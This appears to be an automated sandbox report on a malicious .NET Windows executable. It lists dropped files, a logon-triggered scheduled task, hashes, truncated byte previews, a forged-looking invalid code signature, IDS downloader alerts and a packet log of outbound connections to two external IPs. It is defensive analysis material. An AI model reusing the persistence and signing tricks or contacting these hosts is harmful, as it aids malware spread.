                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                          C:\Users\user\AppData\Roaming\aVmZDnwW.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):698376
                                          Entropy (8bit):7.698144722404077
                                          Encrypted:false
                                          SSDEEP:12288:xIaOq+A8QSkKd5g3yF369jmP6KXbizoJcPw32Awi7BAkR:iar+5g3yB6tOLizoJX
                                          MD5:92E84C83303CDC492EAAED0E1E4B79C6
                                          SHA1:CE2F5255ABED1A4B241ECDD627F6D247594904AE
                                          SHA-256:82107247E3738A1675CF511DD4C051FB438DD1A973171318E960B406246FCF93
                                          SHA-512:12EDF1453FA0AB19D32A47A0AEF36481ABE66F5BCB30F68028E6924ABCFBD7B0BC87759B36BD6FD978B8CA051B0A6C5E69CD11EAE320459EEB3DA4F5EA922558
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 71%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?ng..............0..N...".......m... ........@.. ....................................@.................................Hm..S....................r...6........................................................... ............... ..H............text....M... ...N.................. ..`.rsrc............ ...P..............@..@.reloc...............p..............@..B.................m......H.......X....k......]........7..................................................L.2..s(lg7..jAL......n6..|...B>..l..Tm.p..a...e....z....R...J.o~...\ZV n.1.....3.....b5.i7.....Q...'nw...Jw.y.U. Y.k......$...$i..I(....iN..?.....Q..._...x.p7.t#.....,.V.j...sv7.'Wf".|.....,..Ig..#......Q.....W.t.9.H..V.E....7.@..[...?.*G.?..z....XBp.....2.S6U._%?......_.<.c<...(.Q..[...>u..:....y...~l..={I,.~.).f.z.,O;.A.N.Vd...9{...FC.31/._}E..@<N....K.Z..U.q......$..y........

                                          C:\Users\user\AppData\Roaming\aVmZDnwW.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.698144722404077
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:file.exe
                                          File size:698'376 bytes
                                          MD5:92e84c83303cdc492eaaed0e1e4b79c6
                                          SHA1:ce2f5255abed1a4b241ecdd627f6d247594904ae
                                          SHA256:82107247e3738a1675cf511dd4c051fb438dd1a973171318e960b406246fcf93
                                          SHA512:12edf1453fa0ab19d32a47a0aef36481abe66f5bcb30f68028e6924abcfbd7b0bc87759b36bd6fd978b8ca051b0a6c5e69cd11eae320459eeb3da4f5ea922558
                                          SSDEEP:12288:xIaOq+A8QSkKd5g3yF369jmP6KXbizoJcPw32Awi7BAkR:iar+5g3yB6tOLizoJX
                                          TLSH:F9E4F19C3A05F50FC4479F7189B0FE706A345DE6AA02C2039EDB6EEFB55DA468E041D2
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?ng..............0..N...".......m... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:7d324a191b1e0515

                                          Static PE Info

                                          General

                                          Entrypoint:0x4a6d9e
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x676E3F9D [Fri Dec 27 05:48:13 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Authenticode Signature

                                          Signature Valid:false
                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                          Signature Validation Error:The digital signature of the object did not verify
                                          Error Number:-2146869232
                                          Not Before, Not After
                                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                          Subject Chain
                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                          Version:3
                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                          Serial:7C1118CBBADC95DA3752C46E47A27438

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa6d480x53.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x1ec0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xa72000x3608
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xa4da40xa4e0033464a2439b736a14eb1cdae25449352False0.8911743626800607data7.699766185970356IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xa80000x1ec00x2000ac960054770732c51dfa2b7572289a1fFalse0.83984375data7.268220333601979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xaa0000xc0x200295745abbdb0287bd52f2b10ec1bf5c7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xa80e80x1af5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9340675264454427
                                          RT_GROUP_ICON0xa9be00x14data1.05
                                          RT_VERSION0xa9bf40x2ccdata0.4301675977653631

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2025-01-02T20:19:45.728728+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549724193.122.130.080TCP
                                          2025-01-02T20:19:47.151066+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549724193.122.130.080TCP
                                          2025-01-02T20:19:47.624321+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549728188.114.97.3443TCP
                                          2025-01-02T20:19:48.244406+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549729193.122.130.080TCP
                                          2025-01-02T20:19:49.494395+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549732193.122.130.080TCP
                                          2025-01-02T20:19:50.244444+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549734193.122.130.080TCP
                                          2025-01-02T20:19:50.619445+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549736193.122.130.080TCP
                                          2025-01-02T20:19:51.166282+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549734193.122.130.080TCP
                                          2025-01-02T20:19:51.758223+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549744188.114.97.3443TCP
                                          2025-01-02T20:19:52.385016+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549750193.122.130.080TCP
                                          2025-01-02T20:19:52.688347+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549752188.114.97.3443TCP
                                          2025-01-02T20:19:53.510035+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549761193.122.130.080TCP
                                          2025-01-02T20:19:56.799969+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549790188.114.97.3443TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 2, 2025 20:19:45.109381914 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:45.114232063 CET8049724193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:45.114387989 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:45.114526033 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:45.119261980 CET8049724193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:45.569381952 CET8049724193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:45.573493004 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:45.578322887 CET8049724193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:45.674526930 CET8049724193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:45.728728056 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:45.736793041 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:45.736820936 CET44349725188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:45.736898899 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:45.743561983 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:45.743582010 CET44349725188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:46.214142084 CET44349725188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:46.214250088 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:46.217403889 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:46.217411041 CET44349725188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:46.217691898 CET44349725188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:46.260025024 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:46.757570982 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:46.799324989 CET44349725188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:46.869159937 CET44349725188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:46.869229078 CET44349725188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:46.869278908 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:46.884052992 CET49725443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:46.918324947 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:46.923214912 CET8049724193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:47.021224976 CET8049724193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:47.024863005 CET49728443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:47.024899006 CET44349728188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:47.024974108 CET49728443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:47.025290966 CET49728443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:47.025301933 CET44349728188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:47.151066065 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:47.489103079 CET44349728188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:47.493633986 CET49728443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:47.493658066 CET44349728188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:47.624340057 CET44349728188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:47.624408960 CET44349728188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:47.624476910 CET49728443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:47.625015020 CET49728443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:47.630947113 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:47.632575035 CET4972980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:47.636683941 CET8049724193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:47.636760950 CET4972480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:47.638190031 CET8049729193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:47.638309002 CET4972980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:47.638384104 CET4972980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:47.643112898 CET8049729193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:48.198189974 CET8049729193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:48.199731112 CET49731443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:48.199790001 CET44349731188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:48.200016022 CET49731443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:48.200373888 CET49731443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:48.200388908 CET44349731188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:48.244405985 CET4972980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:48.670614958 CET44349731188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:48.672329903 CET49731443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:48.672357082 CET44349731188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:48.950535059 CET44349731188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:48.950617075 CET44349731188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:48.950675011 CET49731443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:48.962573051 CET49731443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:48.968257904 CET4972980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:48.970391035 CET4973280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:48.973334074 CET8049729193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:48.973383904 CET4972980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:48.975184917 CET8049732193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:48.975254059 CET4973280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:48.975334883 CET4973280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:48.980171919 CET8049732193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:49.445928097 CET8049732193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:49.447247028 CET49733443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:49.447295904 CET44349733188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:49.447690010 CET49733443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:49.447690010 CET49733443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:49.447732925 CET44349733188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:49.494395018 CET4973280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:49.581198931 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:49.586066008 CET8049734193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:49.586188078 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:49.586551905 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:49.591269970 CET8049734193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:49.927186966 CET44349733188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:49.929186106 CET49733443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:49.929202080 CET44349733188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.074969053 CET44349733188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.075038910 CET44349733188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.075458050 CET49733443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.075825930 CET49733443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.080724955 CET4973680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.080761909 CET4973280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.085619926 CET8049736193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:50.085727930 CET4973680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.085854053 CET4973680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.085861921 CET8049732193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:50.086275101 CET8049734193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:50.086285114 CET4973280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.089476109 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.090611935 CET8049736193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:50.094306946 CET8049734193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:50.193069935 CET8049734193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:50.226520061 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.226577997 CET44349737188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.227147102 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.230950117 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.230971098 CET44349737188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.244443893 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.570532084 CET8049736193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:50.571868896 CET49738443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.571904898 CET44349738188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.572081089 CET49738443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.572299957 CET49738443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.572314024 CET44349738188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.619445086 CET4973680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.709533930 CET44349737188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.709676027 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.711065054 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.711076975 CET44349737188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.711421967 CET44349737188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.760324955 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.761044025 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.807334900 CET44349737188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.885788918 CET44349737188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.885844946 CET44349737188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:50.886537075 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.897700071 CET49737443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:50.902162075 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:50.907058001 CET8049734193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:51.119294882 CET8049734193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:51.121551991 CET49744443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.121613979 CET44349744188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.121728897 CET49744443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.121987104 CET49744443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.122006893 CET44349744188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.166281939 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.180179119 CET44349738188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.181936979 CET49738443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.181967020 CET44349738188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.330738068 CET44349738188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.330790997 CET44349738188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.330835104 CET49738443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.331305027 CET49738443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.336672068 CET4974580192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.341527939 CET8049745193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:51.341618061 CET4974580192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.369352102 CET4974580192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.374156952 CET8049745193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:51.606914997 CET44349744188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.608709097 CET49744443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.608766079 CET44349744188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.758243084 CET44349744188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.758297920 CET44349744188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:51.758403063 CET49744443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.758924961 CET49744443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:51.765201092 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.767131090 CET4975080192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.770070076 CET8049734193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:51.770178080 CET4973480192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.771908045 CET8049750193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:51.771981001 CET4975080192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.772279978 CET4975080192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:51.776999950 CET8049750193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:52.042634964 CET8049745193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:52.043726921 CET49752443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.043775082 CET44349752188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.044028044 CET49752443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.044569969 CET49752443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.044583082 CET44349752188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.088171005 CET4974580192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.335079908 CET8049750193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:52.337486982 CET49753443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.337513924 CET44349753188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.337619066 CET49753443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.337903023 CET49753443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.337914944 CET44349753188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.385015965 CET4975080192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.512042046 CET44349752188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.513613939 CET49752443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.513642073 CET44349752188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.688375950 CET44349752188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.688437939 CET44349752188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.688723087 CET49752443192.168.2.5188.114.97.3
